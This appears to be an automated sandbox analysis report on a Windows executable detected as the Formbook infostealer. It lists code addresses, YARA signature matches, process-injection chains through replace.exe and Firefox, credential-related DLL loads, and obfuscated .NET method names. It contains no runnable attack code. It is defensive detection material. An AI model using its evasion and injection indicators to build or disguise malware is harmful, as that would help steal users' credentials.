Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325FA89	4_2_0325FA89
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031BFAA0	4_2_031BFAA0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325E9A6	4_2_0325E9A6
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0319E9A0	4_2_0319E9A0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031699E8	4_2_031699E8
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03240835	4_2_03240835
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A3800	4_2_031A3800
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325F872	4_2_0325F872
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A9870	4_2_031A9870
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031BB870	4_2_031BB870
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03186868	4_2_03186868
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031B6882	4_2_031B6882
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A58B0	4_2_031A58B0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_032578F3	4_2_032578F3
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A28C0	4_2_031A28C0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325FF63	4_2_0325FF63
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325EFBF	4_2_0325EFBF
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03251FC6	4_2_03251FC6
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A6FE0	4_2_031A6FE0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03240E6D	4_2_03240E6D
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031C0E50	4_2_031C0E50
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03250EAD	4_2_03250EAD
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A1EB2	4_2_031A1EB2
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03259ED2	4_2_03259ED2
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325FD27	4_2_0325FD27
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0319AD00	4_2_0319AD00
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03257D4C	4_2_03257D4C
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A0D69	4_2_031A0D69
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031B2DB0	4_2_031B2DB0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A9DD0	4_2_031A9DD0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0323FDF4	4_2_0323FDF4
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03190C12	4_2_03190C12
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031AAC20	4_2_031AAC20
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325EC60	4_2_0325EC60
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03256C69	4_2_03256C69
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0324EC4C	4_2_0324EC4C
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A3C60	4_2_031A3C60
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03239C98	4_2_03239C98
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031B8CDF	4_2_031B8CDF
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0326ACEB	4_2_0326ACEB
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A8CE0	4_2_031A8CE0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031BFCE0	4_2_031BFCE0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028C1950	4_2_028C1950
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028C3200	4_2_028C3200
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028C5020	4_2_028C5020
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028DB640	4_2_028DB640
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028BCAB0	4_2_028BCAB0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028BAB30	4_2_028BAB30
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028BC890	4_2_028BC890
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0306E353	4_2_0306E353
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0306E238	4_2_0306E238
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0306D758	4_2_0306D758
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0306E6EC	4_2_0306E6EC
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0306C9F8	4_2_0306C9F8

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\replace.exe	Code function: String function: 031E7BE4 appears 77 times
Source: C:\Windows\SysWOW64\replace.exe	Code function: String function: 0321EF10 appears 96 times
Source: C:\Windows\SysWOW64\replace.exe	Code function: String function: 0320E692 appears 70 times
Source: C:\Windows\SysWOW64\replace.exe	Code function: String function: 031D5050 appears 34 times
Source: C:\Windows\SysWOW64\replace.exe	Code function: String function: 0318B910 appears 232 times
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: String function: 018AE692 appears 48 times
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: String function: 018BEF10 appears 63 times
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: String function: 0182B910 appears 144 times
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: String function: 01887BE4 appears 54 times

Sample file is different than original file name gathered from version info

Source: SOA SIL TL382920.exe, 00000001.00000002.20981782115.0000000006D20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SOA SIL TL382920.exe
Source: SOA SIL TL382920.exe, 00000001.00000002.20975794512.00000000012AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SOA SIL TL382920.exe
Source: SOA SIL TL382920.exe, 00000001.00000002.20979757407.0000000004039000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SOA SIL TL382920.exe
Source: SOA SIL TL382920.exe, 00000001.00000002.20979757407.000000000425D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SOA SIL TL382920.exe
Source: SOA SIL TL382920.exe, 00000002.00000002.21275498246.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameREPLACE.EXEj% vs SOA SIL TL382920.exe
Source: SOA SIL TL382920.exe, 00000002.00000002.21276030785.000000000192D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs SOA SIL TL382920.exe
Source: SOA SIL TL382920.exe, 00000002.00000002.21275498246.00000000013BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameREPLACE.EXEj% vs SOA SIL TL382920.exe
Source: SOA SIL TL382920.exe	Binary or memory string: OriginalFilenameQpgk.exe8 vs SOA SIL TL382920.exe

Uses 32bit PE files

Source: SOA SIL TL382920.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 2.2.SOA SIL TL382920.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.SOA SIL TL382920.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.23445436246.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.23442870422.0000000001620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.21337354866.0000000006A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.23445613909.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: SOA SIL TL382920.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, rS62YTDrBiKI0c2yp4.cs	Security API names: _0020.SetAccessControl
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, rS62YTDrBiKI0c2yp4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, rS62YTDrBiKI0c2yp4.cs	Security API names: _0020.AddAccessRule
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, FFG4Oq6dFLvXbZlV5u.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, FFG4Oq6dFLvXbZlV5u.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, rS62YTDrBiKI0c2yp4.cs	Security API names: _0020.SetAccessControl
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, rS62YTDrBiKI0c2yp4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, rS62YTDrBiKI0c2yp4.cs	Security API names: _0020.AddAccessRule
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, rS62YTDrBiKI0c2yp4.cs	Security API names: _0020.SetAccessControl
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, rS62YTDrBiKI0c2yp4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, rS62YTDrBiKI0c2yp4.cs	Security API names: _0020.AddAccessRule
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, FFG4Oq6dFLvXbZlV5u.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@18/12

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SOA SIL TL382920.exe.log

Source: unknown	Process created: C:\Users\user\Desktop\SOA SIL TL382920.exe "C:\Users\user\Desktop\SOA SIL TL382920.exe"
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process created: C:\Users\user\Desktop\SOA SIL TL382920.exe "C:\Users\user\Desktop\SOA SIL TL382920.exe"
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
Source: C:\Windows\SysWOW64\replace.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process created: C:\Users\user\Desktop\SOA SIL TL382920.exe "C:\Users\user\Desktop\SOA SIL TL382920.exe"	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: SOA SIL TL382920.exe, Form1.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, rS62YTDrBiKI0c2yp4.cs	.Net Code: FiqjCAEGLR System.Reflection.Assembly.Load(byte[])
Source: 1.2.SOA SIL TL382920.exe.3064930.0.raw.unpack, RZ.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, rS62YTDrBiKI0c2yp4.cs	.Net Code: FiqjCAEGLR System.Reflection.Assembly.Load(byte[])
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, rS62YTDrBiKI0c2yp4.cs	.Net Code: FiqjCAEGLR System.Reflection.Assembly.Load(byte[])
Source: 1.2.SOA SIL TL382920.exe.57c0000.3.raw.unpack, RZ.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 4.2.replace.exe.378cd14.2.raw.unpack, Form1.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 5.0.MBLUUsWuClSd.exe.35bcd14.0.raw.unpack, Form1.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 5.2.MBLUUsWuClSd.exe.35bcd14.0.raw.unpack, Form1.cs	.Net Code: InitializeComponent contains xor as well as GetObject

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_01577ACA push edi; ret	1_2_01577AD1
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_01577AE3 push ebp; ret	1_2_01577AE4
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00418066 push ecx; rep ret	2_2_0041808F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00401A71 pushfd ; retf	2_2_00401ABE
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_004032C0 push eax; ret	2_2_004032C2
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_004162CC pushad ; ret	2_2_004162CD
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00417B73 push ecx; ret	2_2_00417B74
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00417C09 pushfd ; retf	2_2_00417C0C
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00404D68 push es; retf	2_2_00404D6F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00413DC3 push edx; retf	2_2_00413DFD
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00414632 push es; iretd	2_2_00414633
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00415757 push edx; ret	2_2_004157E6
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00415723 push edx; ret	2_2_004157E6
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00404FCF push 001D5E1Fh; retf	2_2_00404FD4
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_004157E7 push ebx; iretd	2_2_004157EB
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00401F9C push esp; ret	2_2_00401FAE
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018308CD push ecx; mov dword ptr [esp], ecx	2_2_018308D6
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031621AD pushad ; retf 0004h	4_2_0316223F
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0316E074 pushfd ; retf	4_2_0316E075
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0316E060 push eax; retf 0008h	4_2_0316E06D
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031697A1 push es; iretd	4_2_031697A8
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031908CD push ecx; mov dword ptr [esp], ecx	4_2_031908D6
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028C136F push es; iretd	4_2_028C1370
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028C3009 pushad ; ret	4_2_028C300A
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028D012D push ebx; retf	4_2_028D012E
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028C2460 push edx; ret	4_2_028C2523
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028B1AA5 push es; retf	4_2_028B1AAC
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028C48B0 push ecx; ret	4_2_028C48B1
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028C4946 pushfd ; retf	4_2_028C4949
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028CBED8 push ecx; retf	4_2_028CBED9
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028C4DA3 push ecx; rep ret	4_2_028C4DCC

Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, AnNfyhuSxfOQKhnA04.cs	High entropy of concatenated method names: 'AScluq9xFj', 'ghSlMlbhoZ', 'VQOljRftMm', 'kQZlRFTFpn', 'Bi3lxENYaY', 'obBlpnK25Y', 'A7DlVEEySe', 'TI8NSILC2Q', 'U22Nyt1wBC', 'XhLNmJWtGV'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, NFyHMq8GrX09kSU6fc.cs	High entropy of concatenated method names: 'Q0GBrfIG5V', 'PF1BdoimVi', 'sOsBCrcdwO', 'rbnBXFSt36', 'LmgBnUWekc', 'Jn2BGNoHg4', 'nS3BUj4Mh6', 'BvWBs5iU4s', 'prABoNG7CG', 'fYGBQpfgWy'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, vEMm9TGqkTbSK2DWuX.cs	High entropy of concatenated method names: 'YFbVTqlxw5', 'XH2VxmgvQ0', 'KLdVpTbIFy', 'aHFVB1ZQhc', 'Dw2VH0o0LK', 'WIGp4FhaM4', 'fRCpt5Yru2', 'jaHpSWJQyN', 'bk4pywvOQs', 'eyOpmiRGW6'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, oh8d8J2Z3QMfQxImdTr.cs	High entropy of concatenated method names: 'MpBlrGwNZx', 'IaQld2S42U', 'FAflCyqVj8', 'tQ5lXeyOfw', 'SPWlnVsnjV', 'EIklGHpuQL', 'EkOlUbIxqs', 'rLalsohUp0', 'GBOlokBHRT', 'lkclQLLVpq'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, rS62YTDrBiKI0c2yp4.cs	High entropy of concatenated method names: 'BPTMTPIyDS', 'I4EMRDtROT', 'Y1jMxcebvW', 'CDfMkrBg5s', 'jeiMpbjB07', 'tBfMVOiuBo', 'hUBMBkaGlI', 'FIFMHfWMcG', 'WovMO9MXXe', 'C9KMADpC5X'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, pUEAtE22XMsD0aDaH3F.cs	High entropy of concatenated method names: 'ToString', 'wXb8MlXaJc', 'YsM8jMPuhv', 'nkW8Tu7IHX', 'CXI8RAMmJA', 'kbI8x4mdaq', 'FT48kQmeUC', 'aqw8pSh0VJ', 'F1OjSrh8vqC97vocmP2', 'sJQOL4hWAii6jktb04L'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, RreqsmkbHTMnh2NVRx.cs	High entropy of concatenated method names: 'uShNRYJyVS', 'gY0NxTlhVc', 'q7nNkvAXIP', 'FLuNpiaWNo', 'R6iNV7p7hi', 'VNqNBVo4aD', 'UH8NHCC21i', 'VB9NOqKlXZ', 'O0CNAd5yq6', 'dUFNWfGqEr'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, XhCqR5zmlyqt5yQm3v.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Sh1l1FbA40', 'ctml7wUF5c', 'hZUl5u9INh', 'yWalJBwixd', 'fIplNBMD1U', 'oIpll3LPxI', 'Wfll8gMeAP'
